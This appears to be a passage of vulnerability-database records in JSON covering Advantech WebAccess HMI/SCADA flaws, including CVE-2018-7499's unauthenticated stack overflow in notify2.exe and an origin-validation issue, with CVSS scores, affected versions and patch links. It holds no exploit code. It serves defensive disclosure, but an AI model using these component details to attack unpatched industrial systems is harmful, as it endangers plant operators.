"https://nvd.nist.gov/vuln/detail/cve-2017-12719" }, { "trust": 0.3, "url": "http://webaccess.advantech.com" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-939" }, { "db": "ZDI", "id": "ZDI-17-940" }, { "db": "CNVD", "id": "CNVD-2017-32564" }, { "db": "VULHUB", "id": "VHN-103269" }, { "db": "BID", "id": "101685" }, { "db": "JVNDB", "id": "JVNDB-2017-009931" }, { "db": "CNNVD", "id": "CNNVD-201711-170" }, { "db": "NVD", "id": "CVE-2017-12719" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "324aeb72-83a5-4ec9-8bfb-77e3df73ed3a", "ident": null }, { "db": "ZDI", "id": "ZDI-17-939", "ident": null }, { "db": "ZDI", "id": "ZDI-17-940", "ident": null }, { "db": "CNVD", "id": "CNVD-2017-32564", "ident": null }, { "db": "VULHUB", "id": "VHN-103269", "ident": null }, { "db": "BID", "id": "101685", "ident": null }, { "db": "JVNDB", "id": "JVNDB-2017-009931", "ident": null }, { "db": "CNNVD", "id": "CNNVD-201711-170", "ident": null }, { "db": "NVD", "id": "CVE-2017-12719", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2017-11-03T00:00:00", "db": "IVD", "id": "324aeb72-83a5-4ec9-8bfb-77e3df73ed3a", "ident": null }, { "date": "2017-12-06T00:00:00", "db": "ZDI", "id": "ZDI-17-939", "ident": null }, { "date": "2017-12-06T00:00:00", "db": "ZDI", "id": "ZDI-17-940", "ident": null }, { "date": "2017-11-03T00:00:00", "db": "CNVD", "id": "CNVD-2017-32564", "ident": null }, { "date": "2017-11-06T00:00:00", "db": "VULHUB", "id": "VHN-103269", "ident": null }, { "date": "2017-11-02T00:00:00", "db": "BID", "id": "101685", "ident": null }, { "date": "2017-11-29T00:00:00", "db": "JVNDB", "id": "JVNDB-2017-009931", "ident": null }, { "date": "2017-11-06T00:00:00", "db": "CNNVD", "id": "CNNVD-201711-170", "ident": null }, { "date": "2017-11-06T22:29:00.193000", "db": "NVD", "id": "CVE-2017-12719", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2017-12-06T00:00:00", "db": "ZDI", "id": "ZDI-17-939", "ident": null }, { "date": "2017-12-06T00:00:00", "db": "ZDI", "id": "ZDI-17-940", "ident": null }, { "date": "2017-11-03T00:00:00", "db": "CNVD", "id": "CNVD-2017-32564", "ident": null }, { "date": "2019-10-09T00:00:00", "db": "VULHUB", "id": "VHN-103269", "ident": null }, { "date": "2017-12-19T22:36:00", "db": "BID", "id": "101685", "ident": null }, { "date": "2017-12-28T00:00:00", "db": "JVNDB", "id": "JVNDB-2017-009931", "ident": null }, { "date": "2019-10-17T00:00:00", "db": "CNNVD", "id": "CNNVD-201711-170", "ident": null }, { "date": "2024-11-21T03:10:05.487000", "db": "NVD", "id": "CVE-2017-12719", "ident": null } ] }, "threat_type": { "_id": null, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201711-170" } ], "trust": 0.6 }, "title": { "_id": null, "data": "Advantech WebAccess webvrpcs drawsrv Untrusted Pointer Dereference Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-17-939" }, { "db": "ZDI", "id": "ZDI-17-940" } ], "trust": 1.4 }, "type": { "_id": null, "data": "Code problem", "sources": [ { "db": "IVD", "id": "324aeb72-83a5-4ec9-8bfb-77e3df73ed3a" }, { "db": "CNNVD", "id": "CNNVD-201711-170" } ], "trust": 0.8 } }
var-201805-1143
Vulnerability from variot
In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, several stack-based buffer overflow vulnerabilities have been identified, which may allow an attacker to execute arbitrary code. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Advantech WebAccess Node. Authentication is not required to exploit this vulnerability.The specific flaw exists within notify2.exe, which is accessed through the 0x2711 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code under the context of Administrator. Advantech WebAccess and others are products of Advantech. Advantech WebAccess is a browser-based HMI/SCADA software. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. WebAccess Dashboard is one of the dashboard components; WebAccess Scada Node is one of the monitoring node components. WebAccess/NMS is a suite of web browsers for the Network Management System (NMS). A stack buffer overflow vulnerability exists in several Advantech products
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess node", "scope": null, "trust": 9.8, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "8.2_20170817" }, { "_id": null, "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "8.3.0" }, { "_id": null, "model": "webaccess\\/nms", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "2.0.3" }, { "_id": null, "model": "webaccess scada", "scope": "lt", "trust": 1.0, "vendor": "advantech", "version": "8.3.1" }, { "_id": null, "model": "webaccess dashboard", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "2.0.15" }, { "_id": null, "model": "webaccess \u003c=8.2 20170817", "scope": null, "trust": 0.6, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=8.3.0" }, { "_id": null, "model": "webaccess dashboard", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=2.0.15" }, { "_id": null, "model": "webaccess scada node", "scope": "lt", "trust": 0.6, "vendor": "advantech", "version": "8.3.1" }, { "_id": null, "model": "webaccess/nms", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=2.0.3" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.3.0" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.2_20170817" }, { "_id": null, "model": "webaccess dashboard", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "2.0.15" }, { "_id": null, "model": "webaccess\\/nms", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "2.0.3" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.4, "vendor": "webaccess", "version": "*" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess dashboard", "version": "*" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess scada", "version": "*" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess nms", "version": "*" } ], "sources": [ { "db": "IVD", "id": "e2f10d30-39ab-11e9-ae57-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-516" }, { "db": "ZDI", "id": "ZDI-18-519" }, { "db": "ZDI", "id": "ZDI-18-523" }, { "db": "ZDI", "id": "ZDI-18-525" }, { "db": "ZDI", "id": "ZDI-18-509" }, { "db": "ZDI", "id": "ZDI-18-511" }, { "db": "ZDI", "id": "ZDI-18-507" }, { "db": "ZDI", "id": "ZDI-18-497" }, { "db": "ZDI", "id": "ZDI-18-518" }, { "db": "ZDI", "id": "ZDI-18-506" }, { "db": "ZDI", "id": "ZDI-18-520" }, { "db": "ZDI", "id": "ZDI-18-498" }, { "db": "ZDI", "id": "ZDI-18-508" }, { "db": "ZDI", "id": "ZDI-18-517" }, { "db": "CNVD", "id": "CNVD-2018-10713" }, { "db": "CNNVD", "id": "CNNVD-201805-446" }, { "db": "NVD", "id": "CVE-2018-7499" } ] }, "credits": { "_id": null, "data": "Mat Powell - Trend Micro Zero Day Initiative", "sources": [ { "db": "ZDI", "id": "ZDI-18-516" }, { "db": "ZDI", "id": "ZDI-18-519" }, { "db": "ZDI", "id": "ZDI-18-523" }, { "db": "ZDI", "id": "ZDI-18-525" }, { "db": "ZDI", "id": "ZDI-18-509" }, { "db": "ZDI", "id": "ZDI-18-511" }, { "db": "ZDI", "id": "ZDI-18-507" }, { "db": "ZDI", "id": "ZDI-18-518" }, { "db": "ZDI", "id": "ZDI-18-506" }, { "db": "ZDI", "id": "ZDI-18-520" }, { "db": "ZDI", "id": "ZDI-18-508" }, { "db": "ZDI", "id": "ZDI-18-517" } ], "trust": 8.4 }, "cve": "CVE-2018-7499", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "CVE-2018-7499", "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 9.8, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2018-7499", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 1.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "CNVD-2018-10713", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "e2f10d30-39ab-11e9-ae57-000c29342cb1", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.9 [IVD]" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2018-7499", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" } ], "severity": [ { "author": "ZDI", "id": "CVE-2018-7499", "trust": 9.8, "value": "HIGH" }, { "author": "nvd@nist.gov", "id": "CVE-2018-7499", "trust": 1.0, "value": "CRITICAL" }, { "author": "CNVD", "id": "CNVD-2018-10713", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201805-446", "trust": 0.6, "value": "CRITICAL" }, { "author": "IVD", "id": "e2f10d30-39ab-11e9-ae57-000c29342cb1", "trust": 0.2, "value": "CRITICAL" } ] } ], "sources": [ { "db": "IVD", "id": "e2f10d30-39ab-11e9-ae57-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-516" }, { "db": "ZDI", "id": "ZDI-18-519" }, { "db": "ZDI", "id": "ZDI-18-523" }, { "db": "ZDI", "id": "ZDI-18-525" }, { "db": "ZDI", "id": "ZDI-18-509" }, { "db": "ZDI", "id": "ZDI-18-511" }, { "db": "ZDI", "id": "ZDI-18-507" }, { "db": "ZDI", "id": "ZDI-18-497" }, { "db": "ZDI", "id": "ZDI-18-518" }, { "db": "ZDI", "id": "ZDI-18-506" }, { "db": "ZDI", "id": "ZDI-18-520" }, { "db": "ZDI", "id": "ZDI-18-498" }, { "db": "ZDI", "id": "ZDI-18-508" }, { "db": "ZDI", "id": "ZDI-18-517" }, { "db": "CNVD", "id": "CNVD-2018-10713" }, { "db": "CNNVD", "id": "CNNVD-201805-446" }, { "db": "NVD", "id": "CVE-2018-7499" } ] }, "description": { "_id": null, "data": "In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, several stack-based buffer overflow vulnerabilities have been identified, which may allow an attacker to execute arbitrary code. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Advantech WebAccess Node. Authentication is not required to exploit this vulnerability.The specific flaw exists within notify2.exe, which is accessed through the 0x2711 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code under the context of Administrator. Advantech WebAccess and others are products of Advantech. Advantech WebAccess is a browser-based HMI/SCADA software. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. WebAccess Dashboard is one of the dashboard components; WebAccess Scada Node is one of the monitoring node components. WebAccess/NMS is a suite of web browsers for the Network Management System (NMS). A stack buffer overflow vulnerability exists in several Advantech products", "sources": [ { "db": "NVD", "id": "CVE-2018-7499" }, { "db": "ZDI", "id": "ZDI-18-516" }, { "db": "ZDI", "id": "ZDI-18-517" }, { "db": "ZDI", "id": "ZDI-18-508" }, { "db": "ZDI", "id": "ZDI-18-498" }, { "db": "ZDI", "id": "ZDI-18-520" }, { "db": "ZDI", "id": "ZDI-18-506" }, { "db": "ZDI", "id": "ZDI-18-518" }, { "db": "ZDI", "id": "ZDI-18-497" }, { "db": "ZDI", "id": "ZDI-18-507" }, { "db": "ZDI", "id": "ZDI-18-511" }, { "db": "ZDI", "id": "ZDI-18-509" }, { "db": "ZDI", "id": "ZDI-18-525" }, { "db": "ZDI", "id": "ZDI-18-523" }, { "db": "ZDI", "id": "ZDI-18-519" }, { "db": "CNVD", "id": "CNVD-2018-10713" }, { "db": "IVD", "id": "e2f10d30-39ab-11e9-ae57-000c29342cb1" } ], "trust": 10.44 }, "external_ids": { "_id": null, "data": [ { "db": "NVD", "id": "CVE-2018-7499", "trust": 12.2 }, { "db": "ICS CERT", "id": "ICSA-18-135-01", "trust": 2.2 }, { "db": "BID", "id": "104190", "trust": 1.6 }, { "db": "CNVD", "id": "CNVD-2018-10713", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201805-446", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5691", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-516", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5694", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-519", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5698", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-523", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5700", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-525", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5684", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-509", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5686", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-511", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5682", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-507", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5662", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-497", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5693", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-518", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5681", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-506", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5695", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-520", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5663", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-498", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5683", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-508", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5692", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-517", "trust": 0.7 }, { "db": "IVD", "id": "E2F10D30-39AB-11E9-AE57-000C29342CB1", "trust": 0.2 } ], "sources": [ { "db": "IVD", "id": "e2f10d30-39ab-11e9-ae57-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-516" }, { "db": "ZDI", "id": "ZDI-18-519" }, { "db": "ZDI", "id": "ZDI-18-523" }, { "db": "ZDI", "id": "ZDI-18-525" }, { "db": "ZDI", "id": "ZDI-18-509" }, { "db": "ZDI", "id": "ZDI-18-511" }, { "db": "ZDI", "id": "ZDI-18-507" }, { "db": "ZDI", "id": "ZDI-18-497" }, { "db": "ZDI", "id": "ZDI-18-518" }, { "db": "ZDI", "id": "ZDI-18-506" }, { "db": "ZDI", "id": "ZDI-18-520" }, { "db": "ZDI", "id": "ZDI-18-498" }, { "db": "ZDI", "id": "ZDI-18-508" }, { "db": "ZDI", "id": "ZDI-18-517" }, { "db": "CNVD", "id": "CNVD-2018-10713" }, { "db": "CNNVD", "id": "CNNVD-201805-446" }, { "db": "NVD", "id": "CVE-2018-7499" } ] }, "id": "VAR-201805-1143", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "e2f10d30-39ab-11e9-ae57-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-10713" } ], "trust": 1.4316815933333333 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "e2f10d30-39ab-11e9-ae57-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-10713" } ] }, "last_update_date": "2024-11-29T22:46:30.150000Z", "patch": { "_id": null, "data": [ { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 9.8, "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01" }, { "title": "Patch for Advantech WebAccess Stack Buffer Overflow Vulnerability (CNVD-2018-10713)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/130743" }, { "title": "Multiple Advantech Product Buffer Error Vulnerability Fix", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=80056" } ], "sources": [ { "db": "ZDI", "id": "ZDI-18-516" }, { "db": "ZDI", "id": "ZDI-18-519" }, { "db": "ZDI", "id": "ZDI-18-523" }, { "db": "ZDI", "id": "ZDI-18-525" }, { "db": "ZDI", "id": "ZDI-18-509" }, { "db": "ZDI", "id": "ZDI-18-511" }, { "db": "ZDI", "id": "ZDI-18-507" }, { "db": "ZDI", "id": "ZDI-18-497" }, { "db": "ZDI", "id": "ZDI-18-518" }, { "db": "ZDI", "id": "ZDI-18-506" }, { "db": "ZDI", "id": "ZDI-18-520" }, { "db": "ZDI", "id": "ZDI-18-498" }, { "db": "ZDI", "id": "ZDI-18-508" }, { "db": "ZDI", "id": "ZDI-18-517" }, { "db": "CNVD", "id": "CNVD-2018-10713" }, { "db": "CNNVD", "id": "CNNVD-201805-446" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "CWE-121", "trust": 1.0 }, { "problemtype": "CWE-787", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2018-7499" } ] }, "references": { "_id": null, "data": [ { "trust": 12.0, "url": "https://ics-cert.us-cert.gov/advisories/icsa-18-135-01" }, { "trust": 1.6, "url": "http://www.securityfocus.com/bid/104190" } ], "sources": [ { "db": "ZDI", "id": "ZDI-18-516" }, { "db": "ZDI", "id": "ZDI-18-519" }, { "db": "ZDI", "id": "ZDI-18-523" }, { "db": "ZDI", "id": "ZDI-18-525" }, { "db": "ZDI", "id": "ZDI-18-509" }, { "db": "ZDI", "id": "ZDI-18-511" }, { "db": "ZDI", "id": "ZDI-18-507" }, { "db": "ZDI", "id": "ZDI-18-497" }, { "db": "ZDI", "id": "ZDI-18-518" }, { "db": "ZDI", "id": "ZDI-18-506" }, { "db": "ZDI", "id": "ZDI-18-520" }, { "db": "ZDI", "id": "ZDI-18-498" }, { "db": "ZDI", "id": "ZDI-18-508" }, { "db": "ZDI", "id": "ZDI-18-517" }, { "db": "CNVD", "id": "CNVD-2018-10713" }, { "db": "CNNVD", "id": "CNNVD-201805-446" }, { "db": "NVD", "id": "CVE-2018-7499" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "e2f10d30-39ab-11e9-ae57-000c29342cb1", "ident": null }, { "db": "ZDI", "id": "ZDI-18-516", "ident": null }, { "db": "ZDI", "id": "ZDI-18-519", "ident": null }, { "db": "ZDI", "id": "ZDI-18-523", "ident": null }, { "db": "ZDI", "id": "ZDI-18-525", "ident": null }, { "db": "ZDI", "id": "ZDI-18-509", "ident": null }, { "db": "ZDI", "id": "ZDI-18-511", "ident": null }, { "db": "ZDI", "id": "ZDI-18-507", "ident": null }, { "db": "ZDI", "id": "ZDI-18-497", "ident": null }, { "db": "ZDI", "id": "ZDI-18-518", "ident": null }, { "db": "ZDI", "id": "ZDI-18-506", "ident": null }, { "db": "ZDI", "id": "ZDI-18-520", "ident": null }, { "db": "ZDI", "id": "ZDI-18-498", "ident": null }, { "db": "ZDI", "id": "ZDI-18-508", "ident": null }, { "db": "ZDI", "id": "ZDI-18-517", "ident": null }, { "db": "CNVD", "id": "CNVD-2018-10713", "ident": null }, { "db": "CNNVD", "id": "CNNVD-201805-446", "ident": null }, { "db": "NVD", "id": "CVE-2018-7499", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2018-05-31T00:00:00", "db": "IVD", "id": "e2f10d30-39ab-11e9-ae57-000c29342cb1", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-516", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-519", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-523", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-525", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-509", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-511", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-507", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-497", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-518", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-506", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-520", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-498", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-508", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-517", "ident": null }, { "date": "2018-05-31T00:00:00", "db": "CNVD", "id": "CNVD-2018-10713", "ident": null }, { "date": "2018-05-16T00:00:00", "db": "CNNVD", "id": "CNNVD-201805-446", "ident": null }, { "date": "2018-05-15T22:29:00.503000", "db": "NVD", "id": "CVE-2018-7499", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-516", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-519", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-523", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-525", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-509", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-511", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-507", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-497", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-518", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-506", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-520", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-498", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-508", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-517", "ident": null }, { "date": "2018-05-31T00:00:00", "db": "CNVD", "id": "CNVD-2018-10713", "ident": null }, { "date": "2020-10-09T00:00:00", "db": "CNNVD", "id": "CNNVD-201805-446", "ident": null }, { "date": "2024-11-21T04:12:15.050000", "db": "NVD", "id": "CVE-2018-7499", "ident": null } ] }, "threat_type": { "_id": null, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201805-446" } ], "trust": 0.6 }, "title": { "_id": null, "data": "Advantech WebAccess Node bwtagblk Stack-based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-18-516" } ], "trust": 0.7 }, "type": { "_id": null, "data": "Buffer error", "sources": [ { "db": "IVD", "id": "e2f10d30-39ab-11e9-ae57-000c29342cb1" }, { "db": "CNNVD", "id": "CNNVD-201805-446" } ], "trust": 0.8 } }
var-201805-0251
Vulnerability from variot
In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, an origin validation error vulnerability has been identified, which may allow an attacker can create a malicious web site, steal session cookies, and access data of authenticated users. Advantech WebAccess Contains a session fixation vulnerability.Information may be obtained. Advantech WebAccess and others are products of Advantech. Advantech WebAccess is a browser-based HMI/SCADA software. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. WebAccess Dashboard is one of the dashboard components; WebAccess Scada Node is one of the monitoring node components. WebAccess/NMS is a suite of web browsers for the Network Management System (NMS). Security vulnerabilities exist in several Advantech products. Multiple SQL-injection vulnerabilities 2. An information-disclosure vulnerability 3. A file-upload vulnerability 4. Multiple directory-traversal vulnerabilities 5. Multiple stack-based buffer-overflow vulnerabilities 6. A heap-based buffer-overflow vulnerability 7. Multiple arbitrary code-execution vulnerabilities 8. A denial-of-service vulnerability 9. A security-bypass vulnerability 10. A privilege-escalation vulnerability An attacker can exploit these issues to execute arbitrary code in the context of the application, or modify data, or exploit latent vulnerabilities in the underlying database, delete arbitrary files, gain elevated privileges, perform certain unauthorized actions, upload arbitrary files to the affected application gain unauthorized access and obtain sensitive information. Failed attacks will cause denial of service conditions. Advantech WebAccess, etc. Advantech WebAccess is a set of HMI/SCADA software based on browser architecture. The following versions are affected: Advantech WebAccess 8.2_20170817 and earlier, 8.3.0 and earlier; WebAccess Dashboard 2.0.15 and earlier; WebAccess Scada Node 8.3.1 and earlier; WebAccess/NMS 2.0.3 and earlier
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201805-0251", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "lte", "trust": 1.8, "vendor": "advantech", "version": "8.2_20170817" }, { "model": "webaccess", "scope": "lte", "trust": 1.8, "vendor": "advantech", "version": "8.3.0" }, { "model": "webaccess dashboard", "scope": "lte", "trust": 1.8, "vendor": "advantech", "version": "2.0.15" }, { "model": "webaccess scada node", "scope": "lt", "trust": 1.4, 